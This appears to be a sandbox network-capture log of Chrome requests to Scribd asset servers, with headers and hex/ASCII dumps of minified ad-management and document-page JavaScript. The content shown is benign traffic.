                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 72 6e 20 65 2e 65 78 70 6f 72 74 73 3d 74 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 29 7d 2c 74 28 6e 29 7d 65 2e 65 78 70 6f 72 74 73 3d 74 7d 2c 32 30 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 34 38 39 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: rn e.exports=t=Object.setPrototypeOf?Object.getPrototypeOf:function(e){return e.__proto__||Object.getPrototypeOf(e)},t(n)}e.exports=t},205:function(e,t,n){var r=n(489);e.exports=function(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super ex
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f 65 2e 65 78 70 6f 72 74 73 3d 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 65 7d 3a 65 2e 65 78 70 6f 72 74 73 3d 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c 74 28 6e 29 7d 65 2e 65 78 70 6f 72 74 73 3d 74 7d 2c 33 37 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 32 32 38 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: of Symbol.iterator?e.exports=t=function(e){return typeof e}:e.exports=t=function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},t(n)}e.exports=t},379:function(e,t,n){var r=n(228);e.exports=function(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 6b 3d 6e 65 77 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 75 28 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 70 61 67 65 4b 65 79 56 61 6c 75 65 50 61 69 72 73 3d 7b 7d 2c 74 68 69 73 2e 6d 61 70 70 69 6e 67 43 6f 6e 66 69 67 3d 7b 7d 2c 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 73 3d 5b 5d 2c 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ject(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var k=new(function(){function e(){u()(this,e),this.pageKeyValuePairs={},this.mappingConfig={},this.keyValueConfigMappings=[],this.keyValueConfigMappi
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 73 2e 6c 6f 61 64 65 64 29 7b 65 2e 6e 65 78 74 3d 32 33 3b 62 72 65 61 6b 7d 69 66 28 74 68 69 73 2e 6c 6f 61 64 65 64 3d 77 69 6e 64 6f 77 2e 66 72 65 65 73 74 61 72 52 65 61 63 74 43 6f 6d 70 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 3d 21 30 2c 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 4c 6f 63 61 74 69 6f 6e 3d 6e 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 22 66 73 64 65 62 75 67 22 29 3e 2d 31 3f 22 2f 71 61 22 3a 22 22 2c 6f 3d 22 68 74 74 70 73 3a 2f 2f 61 2e 70 75 62 2e 6e 65 74 77 6f 72 6b 2f 22 2e 63 6f 6e 63 61 74 28 74 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 70 75 62 66 69 67 2e 6d 69 6e 2e 6a 73 22 29 2c 77 69 6e 64 6f 77 2e 66 72 65 65 73 74 61 72 3d 77
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s.loaded){e.next=23;break}if(this.loaded=window.freestarReactCompontentLoaded=!0,this.keyValueConfigMappingLocation=n,a=window.location.search.indexOf("fsdebug")>-1?"/qa":"",o="https://a.pub.network/".concat(t).concat(a,"/pubfig.min.js"),window.freestar=w
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 68 28 65 2e 70 72 65 76 3d 65 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 72 3d 4f 28 4f 28 7b 7d 2c 74 68 69 73 2e 70 61 67 65 4b 65 79 56 61 6c 75 65 50 61 69 72 73 29 2c 6e 29 2c 21 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 4c 6f 63 61 74 69 6f 6e 7c 7c 30 21 3d 3d 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 73 2e 6c 65 6e 67 74 68 29 7b 65 2e 6e 65 78 74 3d 35 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 34 2c 74 68 69 73 2e 66 65 74 63 68 4b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 28 74 68 69 73 2e 6b 65 79 56 61 6c 75 65 43 6f 6e 66 69 67 4d 61 70 70 69 6e 67 4c 6f 63 61 74 69 6f 6e 29 3b 63 61 73 65 20 34 3a 74 68 69 73 2e 6b 65 79 56
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h(e.prev=e.next){case 0:if(r=O(O({},this.pageKeyValuePairs),n),!this.keyValueConfigMappingLocation||0!==this.keyValueConfigMappings.length){e.next=5;break}return e.next=4,this.fetchKeyValueConfigMapping(this.keyValueConfigMappingLocation);case 4:this.keyV
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 68 69 73 2e 6e 65 77 41 64 53 6c 6f 74 51 75 65 75 65 3d 5b 5d 2c 65 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 64 55 6e 69 74 50 61 74 68 3f 28 65 2e 64 69 72 65 63 74 47 61 6d 41 64 73 2e 70 75 73 68 28 74 29 2c 65 29 3a 74 2e 63 68 61 6e 6e 65 6c 3f 28 65 2e 63 68 61 6e 6e 65 6c 41 64 4d 61 70 5b 74 2e 63 68 61 6e 6e 65 6c 5d 7c 7c 28 65 2e 63 68 61 6e 6e 65 6c 41 64 4d 61 70 5b 74 2e 63 68 61 6e 6e 65 6c 5d 3d 5b 5d 29 2c 65 2e 63 68 61 6e 6e 65 6c 41 64 4d 61 70 5b 74 2e 63 68 61 6e 6e 65 6c 5d 2e 70 75 73 68 28 7b 73 6c 6f 74 49 64 3a 74 2e 73 6c 6f 74 49 64 2c 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 3a 74 2e 70 6c 61 63 65 6d 65 6e 74 4e 61 6d 65 2c 74 61 72 67 65 74 69 6e 67 3a 74 2e 74 61 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: his.newAdSlotQueue=[],e.reduce((function(e,t){return t.adUnitPath?(e.directGamAds.push(t),e):t.channel?(e.channelAdMap[t.channel]||(e.channelAdMap[t.channel]=[]),e.channelAdMap[t.channel].push({slotId:t.slotId,placementName:t.placementName,targeting:t.tar
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 64 65 66 69 6e 65 53 69 7a 65 4d 61 70 70 69 6e 67 28 61 29 7d 65 2e 74 61 72 67 65 74 69 6e 67 26 26 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 65 2e 74 61 72 67 65 74 69 6e 67 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 49 28 29 28 65 2c 32 29 2c 72 3d 74 5b 30 5d 2c 61 3d 74 5b 31 5d 3b 6e 2e 73 65 74 54 61 72 67 65 74 69 6e 67 28 72 2c 61 29 7d 29 29 2c 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 2e 64 69 73 70 6c 61 79 28 6e 29 2c 72 2e 70 75 73 68 28 6e 29 2c 74 2e 61 64 53 6c 6f 74 73 4d 61 70 5b 6e 2e 67 65 74 41 64 55 6e 69 74 50 61 74 68 28 29 5d 3d 6e 7d 29 29 2c 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 74 61 67 2e 70 75 62 61 64 73 28 29 2e 72 65 66 72 65 73 68 28 72 29 2c 65 2e 66 6f 72 45 61 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: defineSizeMapping(a)}e.targeting&&Object.entries(e.targeting).forEach((function(e){var t=I()(e,2),r=t[0],a=t[1];n.setTargeting(r,a)})),window.googletag.display(n),r.push(n),t.adSlotsMap[n.getAdUnitPath()]=n})),window.googletag.pubads().refresh(r),e.forEac
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 72 65 66 72 65 73 68 41 64 53 6c 6f 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 61 29 7b 76 61 72 20 6f 3d 74 68 69 73 3b 74 68 69 73 2e 6c 6f 67 28 30 2c 22 52 65 66 72 65 73 68 69 6e 67 20 41 64 20 73 6c 6f 74 20 5b 22 2e 63 6f 6e 63 61 74 28 74 2c 22 5d 22 29 29 2c 77 69 6e 64 6f 77 2e 66 72 65 65 73 74 61 72 2e 71 75 65 75 65 2e 70 75 73 68 28 73 28 29 28 69 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 72 65 74 75 72 6e 20 69 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 69 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 69 2e 70 72 65 76 3d 69 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 69 66 28 61 29 7b 69 2e 6e 65 78 74 3d 37 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 69 2e 6e 65 78 74 3d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: refreshAdSlot",value:function(e,t,n,r,a){var o=this;this.log(0,"Refreshing Ad slot [".concat(t,"]")),window.freestar.queue.push(s()(i().mark((function s(){return i().wrap((function(i){for(;;)switch(i.prev=i.next){case 0:if(a){i.next=7;break}return i.next=
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 62 6c 65 64 22 29 29 2c 21 31 3d 3d 3d 65 26 26 21 30 3d 3d 3d 74 68 69 73 2e 71 75 65 75 65 26 26 74 68 69 73 2e 66 6c 75 73 68 51 75 65 75 65 64 4e 65 77 41 64 53 6c 6f 74 73 28 29 2c 74 68 69 73 2e 71 75 65 75 65 3d 65 7d 7d 5d 29 2c 65 7d 28 29 29 2c 6a 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 28 29 28 6f 2c 65 29 3b 76 61 72 20 74 2c 6e 2c 72 2c 61 3d 28 6e 3d 6f 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: bled")),!1===e&&!0===this.queue&&this.flushQueuedNewAdSlots(),this.queue=e}}]),e}()),j=function(e){f()(o,e);var t,n,r,a=(n=o,r=function(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        13192.168.2.1649726151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC577OUTGET /webpack/doc_page/app.d6ad9e.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC685INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 375564
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Fri, 06 Dec 2024 19:31:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "52a8560347b92a56f62477b5552ed904"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890046-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522359.397120,VS0,VE245
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding,Origin
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 63 72 69 62 64 5f 61 70 70 5f 64 6f 63 70 61 67 65 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 32 34 5d 2c 7b 37 35 38 37 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 72 3d 6e 28 33 38 35 34 34 29 2c 6f 3d 6e 28 36 32 38 33 32 29 2c 73 3d 6e 2e 6e 28 6f 29 2c 61 3d 6e 28 34 30 38 38 30 29 2c 69 3d 6e 28 39 36 35 34 30 29 2c 6c 3d 6e 28 33 30 36 38 36 29 3b 66 75 6e 63 74 69 6f 6e 20 63 28 7b 63 6f 70 79 72 69 67 68 74 3a 65 2c 68 65 61 64 69 6e 67 4c 65 76 65 6c 3a 74 2c 69 6e 6c 69 6e 65 3a 6e 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (self.webpackChunk_scribd_app_docpage=self.webpackChunk_scribd_app_docpage||[]).push([[524],{75875:(e,t,n)=>{"use strict";n.d(t,{A:()=>d});var r=n(38544),o=n(62832),s=n.n(o),a=n(40880),i=n(96540),l=n(30686);function c({copyright:e,headingLevel:t,inline:n}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 6e 28 22 2c 20 22 29 2c 70 3d 28 6e 75 6c 6c 3d 3d 3d 65 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 6c 65 6e 67 74 68 29 26 26 6e 75 6c 6c 21 3d 3d 74 3b 72 65 74 75 72 6e 20 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 70 3f 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2c 7b 68 65 61 64 69 6e 67 3a 60 24 7b 72 2e 41 2e 74 28 22 64 6f 63 5f 70 61 67 65 2e 6d 65 74 61 64 61 74 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 6f 72 69 67 69 6e 61 6c 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 29 7d 3a 60 2c 74 65 78 74 3a 65 7d 29 3a 6e 75 6c 6c 2c 6e 3f 6f 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2c 7b 68 65 61 64 69 6e 67 3a 72 2e 41 2e 74 28 22 77 65 62 70 61 63 6b 2e 64 6f 63 5f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: n(", "),p=(null===e||void 0===e?void 0:e.length)&&null!==t;return o.createElement(o.Fragment,null,p?o.createElement(c,{heading:`${r.A.t("doc_page.metadata.description.original_description")}:`,text:e}):null,n?o.createElement(c,{heading:r.A.t("webpack.doc_
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 67 65 5f 62 6f 64 79 5f 6d 65 74 61 64 61 74 61 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 22 64 61 74 61 5f 72 6f 77 20 64 65 73 63 72 69 70 74 69 6f 6e 22 2c 65 2c 7b 69 6e 6c 69 6e 65 3a 68 2c 73 63 72 69 62 64 52 65 62 72 61 6e 64 3a 77 7d 29 2c 72 65 66 3a 74 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 6e 7c 7c 21 66 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 6f 6e 73 74 20 65 3d 68 3f 60 24 7b 61 2e 41 2e 74 28 22 64 6f 63 5f 70 61 67 65 2e 6d 65 74 61 64 61 74 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 6f 72 69 67 69 6e 61 6c 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 29 7d 3a 20 60 3a 61 2e 41 2e 74 28 22 64 6f 63 5f 70 61 67 65 2e 6d 65 74 61 64 61 74 61 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 6f 72 69 67 69 6e 61 6c 5f 64 65 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ge_body_metadata_description","data_row description",e,{inline:h,scribdRebrand:w}),ref:t},function(){if(null===n||!f)return null;const e=h?`${a.A.t("doc_page.metadata.description.original_description")}: `:a.A.t("doc_page.metadata.description.original_des
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 73 3d 6e 2e 6e 28 6f 29 2c 61 3d 6e 28 34 30 38 38 30 29 2c 69 3d 6e 28 39 36 35 34 30 29 2c 6c 3d 6e 28 33 38 39 37 39 29 2c 63 3d 6e 28 33 30 36 38 36 29 3b 63 6c 61 73 73 20 64 20 65 78 74 65 6e 64 73 20 69 2e 43 6f 6d 70 6f 6e 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 65 29 7d 67 65 74 20 66 6f 72 6d 61 74 73 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 6f 70 73 2e 65 78 74 65 6e 73 69 6f 6e 73 2e 6d 61 70 28 28 65 3d 3e 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 29 2e 6a 6f 69 6e 28 22 2c 20 22 29 7d 72 65 6e 64 65 72 48 65 61 64 69 6e 67 28 29 7b 63 6f 6e 73 74 20 65 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2e 41 2c 7b 6c 65 76 65 6c 3a 74 68 69 73 2e 70 72 6f 70 73 2e 68 65 61 64 69 6e 67 4c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s=n.n(o),a=n(40880),i=n(96540),l=n(38979),c=n(30686);class d extends i.Component{constructor(e){super(e)}get formats(){return this.props.extensions.map((e=>e.toUpperCase())).join(", ")}renderHeading(){const e=i.createElement(c.A,{level:this.props.headingL
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 6f 6c 6f 6e 22 29 3b 72 65 74 75 72 6e 20 74 26 26 28 6e 3d 61 2e 41 2e 74 28 22 70 64 66 73 2e 73 69 64 65 62 61 72 2e 69 73 62 6e 22 29 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6c 2e 41 2c 7b 6c 65 76 65 6c 3a 65 7d 2c 6e 29 7d 28 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 6e 75 6c 6c 2c 6e 29 29 7d 63 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 68 65 61 64 69 6e 67 4c 65 76 65 6c 3a 33 2c 69 6e 6c 69 6e 65 3a 21 30 7d 3b 63 6f 6e 73 74 20 64 3d 28 30 2c 72 2e 4e 67 29 28 28 65 3d 3e 28 7b 69 73 62 6e 3a 65 2e 77 6f 72 64 44 6f 63 75 6d 65 6e 74 2e 69 73 62 6e 7d 29 29 29 28 63 29 7d 2c 37 30 39 39 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: olon");return t&&(n=a.A.t("pdfs.sidebar.isbn")),i.createElement(l.A,{level:e},n)}(),i.createElement("div",null,n))}c.defaultProps={headingLevel:3,inline:!0};const d=(0,r.Ng)((e=>({isbn:e.wordDocument.isbn})))(c)},70996:(e,t,n)=>{"use strict";n.d(t,{A:()=>
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 62 72 61 6e 64 29 29 3b 6c 65 74 20 68 3d 30 2c 67 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 2c 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 7d 2c 61 2e 41 2e 74 28 22 64 6f 63 5f 70 61 67 65 2e 72 61 74 69 6e 67 73 2e 6e 6f 5f 72 61 74 69 6e 67 73 22 29 29 3b 72 65 74 75 72 6e 20 65 3e 30 26 26 28 68 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 74 2f 65 2a 31 30 30 29 2c 67 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 69 2e 46 72 61 67 6d 65 6e 74 2c 6e 75 6c 6c 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 70 61 6e 22 2c 7b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 28 29 28 75 2c 7b 5b 6d 5d 3a 6f 7d 29 7d 2c 60 24 7b 68 7d 25 60 29 2c 69 2e 63 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: brand));let h=0,g=i.createElement("span",{"aria-hidden":"true"},a.A.t("doc_page.ratings.no_ratings"));return e>0&&(h=Math.round(t/e*100),g=i.createElement(i.Fragment,null,i.createElement("span",{"aria-hidden":"true",className:s()(u,{[m]:o})},`${h}%`),i.cr
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 3d 6e 28 33 38 39 37 39 29 2c 6d 3d 6e 28 33 30 36 38 36 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 7b 63 72 65 61 74 65 64 41 74 3a 65 2c 68 65 61 64 69 6e 67 4c 65 76 65 6c 3a 74 2c 69 6e 6c 69 6e 65 3a 6e 7d 29 7b 72 65 74 75 72 6e 20 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 28 29 28 22 61 75 74 6f 5f 5f 61 70 70 5f 70 61 67 65 5f 62 6f 64 79 5f 6d 65 74 61 64 61 74 61 5f 63 72 65 61 74 65 64 5f 61 74 22 2c 22 64 61 74 61 5f 72 6f 77 20 63 72 65 61 74 65 64 5f 61 74 22 2c 7b 69 6e 6c 69 6e 65 3a 6e 7d 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6d 2e 41 2c 7b 6c 65 76 65 6c 3a 74 7d 2c 75 2e 41 2e 74 28 22 77 65 62 70 61 63 6b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =n(38979),m=n(30686);function _({createdAt:e,headingLevel:t,inline:n}){return s.createElement("div",{className:o()("auto__app_page_body_metadata_created_at","data_row created_at",{inline:n})},function(){const e=s.createElement(m.A,{level:t},u.A.t("webpack
